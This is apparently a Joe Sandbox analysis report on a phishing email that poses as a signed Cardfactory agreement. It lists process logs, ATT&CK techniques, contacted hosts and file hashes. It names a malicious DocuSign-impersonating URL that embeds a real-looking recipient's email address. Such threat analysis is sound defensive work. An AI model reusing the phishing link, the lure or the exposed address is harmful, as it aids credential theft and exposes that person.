      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation31
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Process Injection
      LSASS Memory1
      File and Directory Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      DLL Side-Loading
      Security Account Manager13
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      104.18.11.207
      truefalse
        high
        cos.sa-saopaulo.myqcloud.com
        43.135.205.247
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            code.jquery.com
            151.101.66.137
            truefalse
              high
              2043758164.cloudhostbuilder.com
              162.241.149.91
              truefalse
                unknown
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  docusign.legalcloudfiles.com
                  104.21.37.156
                  truetrue
                    unknown
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.11.207
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          s-part-0017.t-0009.t-msedge.net
                          13.107.246.45
                          truefalse
                            high
                            www.google.com
                            142.250.185.132
                            truefalse
                              high
                              2043758164-1323985617.cos.sa-saopaulo.myqcloud.com
                              unknown
                              unknownfalse
                                unknown
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.uktrue
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.18.10.207
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    13.107.246.45
                                    s-part-0017.t-0009.t-msedge.netUnited States
                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    184.28.88.176
                                    unknownUnited States
                                    16625AKAMAI-ASUSfalse
                                    104.18.94.41
                                    challenges.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    43.135.205.247
                                    cos.sa-saopaulo.myqcloud.comJapan4249LILLY-ASUSfalse
                                    2.16.168.101
                                    unknownEuropean Union
                                    20940AKAMAI-ASN1EUfalse
                                    20.189.173.2
                                    unknownUnited States
                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    23.56.162.204
                                    unknownUnited States
                                    16625AKAMAI-ASUSfalse
                                    151.101.130.137
                                    unknownUnited States
                                    54113FASTLYUSfalse
                                    216.58.206.35
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    50.16.47.176
                                    unknownUnited States
                                    14618AMAZON-AESUSfalse
                                    142.250.185.163
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    151.101.66.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    104.21.37.156
                                    docusign.legalcloudfiles.comUnited States
                                    13335CLOUDFLARENETUStrue
                                    172.64.41.3
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    142.250.186.138
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    52.113.194.132
                                    unknownUnited States
                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    104.17.24.14
                                    cdnjs.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    1.1.1.1
                                    unknownAustralia
                                    13335CLOUDFLARENETUSfalse
                                    52.109.68.130
                                    unknownUnited States
                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    142.250.185.132
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    142.250.185.110
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    104.18.95.41
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    216.58.206.42
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    104.18.11.207
                                    stackpath.bootstrapcdn.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    43.157.144.192
                                    unknownJapan4249LILLY-ASUSfalse
                                    142.250.185.174
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    172.217.18.106
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    152.199.21.175
                                    sni1gl.wpc.omegacdn.netUnited States
                                    15133EDGECASTUSfalse
                                    64.233.184.84
                                    unknownUnited States
                                    15169GOOGLEUSfalse
                                    52.109.76.240
                                    unknownUnited States
                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    162.241.149.91
                                    2043758164.cloudhostbuilder.comUnited States
                                    46606UNIFIEDLAYER-AS-1USfalse
                                    52.109.76.243
                                    unknownUnited States
                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    IP
                                    192.168.2.16
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1590051
                                    Start date and time:2025-01-13 14:42:39 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    Analysis Mode:stream
                                    Analysis stop reason:Timeout
                                    Sample name:Cardfactory Executed Agreement DocsID- Sign & Review..eml
                                    Detection:MAL
                                    Classification:mal76.phis.winEML@36/58@42/262
                                    Cookbook Comments:
                                    • Found application associated with file extension: .eml
                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.76.243, 2.16.168.101, 2.16.168.119, 52.109.68.130, 4.175.87.197, 20.189.173.2
                                    • Excluded domains from analysis (whitelisted): omex.cdn.office.net, odc.officeapps.live.com, europe.odcsm1.live.com.akadns.net, slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, sls.update.microsoft.com, officeclient.microsoft.com, a1864.dscd.akamai.net, glb.sls.prod.dcat.dsp.trafficmanager.net, ecs.office.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, frc-azsc-000.odc.officeapps.live.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdwus01.westus.cloudapp.azure.com, osiprod-frc-bronze-azsc-000.francecentral.cloudapp.azure.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, europe.configsvc1.live.com.akadns.net, prod.od
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtSetValueKey calls found.
                                    • Timeout during stream target processing, analysis might miss dynamic analysis data
                                    • VT rate limit hit for: cos.sa-saopaulo.myqcloud.com
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):5.189912792270877
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:671E87A0241E9924F9FEB9FE6DADD287
                                    SHA1:0CF5A209F0B5EE50DBAE27ED8FE4347CBDC6E690
                                    SHA-256:F7F71C2A391DA98302FA9072E469EAC9E38CE592EEDD9E9632209AD9A129D1A2
                                    SHA-512:83D8551D42FB553584487FD9205270D890679B410EC12F82AC1D9327B90524019B3EE462AAEE207A579117FD6C86B8BCA7E40E6A2AA0B6B63DD19BE83FC9DFD4
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:2025/01/13-08:43:19.120 17b0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/13-08:43:19.122 17b0 Recovering log #3.2025/01/13-08:43:19.122 17b0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):331
                                    Entropy (8bit):5.188034208669438
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:ED8517FDF50E9162F4A2492448E110D3
                                    SHA1:3941E2056C84FDE9DC9A29A20DCE92B6549D16E1
                                    SHA-256:D6E4EECE1250209780EC018EF5733199A5016C5E1EC478C7ED73E95BDA638935
                                    SHA-512:08414F8D5072F69C09A2AFAC0CEB371F67E65D200B934A281370D42A1FDCC8B51156E2AD650B9F7EAAF2F403FC8F34F0E10FEC04002D4388C0F815619819248E
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:2025/01/13-08:43:18.985 6c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/13-08:43:19.018 6c8 Recovering log #3.2025/01/13-08:43:19.018 6c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:JSON data
                                    Category:modified
                                    Size (bytes):403
                                    Entropy (8bit):4.953858338552356
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):0
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):0
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4C313FE514B5F4E7E89329630909F8DC
                                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):473
                                    Entropy (8bit):4.952723917609178
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F565D3B96EFC2F9A11C20C54A39ED19C
                                    SHA1:2BA6C53D591CA13075A5975CD6F3749614F6D16D
                                    SHA-256:B0BAF5CD315ADC365593557899CABDB25BB0A852F98BBA40DF761D0E0F1EB541
                                    SHA-512:79A5A7021C02D40761A0AF89544D0ED45F94BB374E81BDC1AA271A3828351EFCED0E304D66659C36421A12416586CA3F27353A3FA8F06B6579F34B9EC2F66137
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"broken_until":"1736776114","host":"chrome.cloudflare-dns.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381335811050618","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):4099
                                    Entropy (8bit):5.240057603775631
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B5D0B380AB62AE0FA9A13EFCD0D8FFA2
                                    SHA1:DAC9A25400E200886485FC480D6A30A1FEF451B1
                                    SHA-256:72E985DDDBA93EBE3A80F3FC8CE394C27B81EFAB882CAE40B3C4B9149AFC3F32
                                    SHA-512:24C91C821073E9B4017589B8F454103BE8EAE539139E360C15B357518429F80FBC25CE60F3C44D8121299F2F82E8E97C656103C4E9C7D6091A31D138CFDFBAE6
                                    Malicious:false
                                    Reputation:unknown
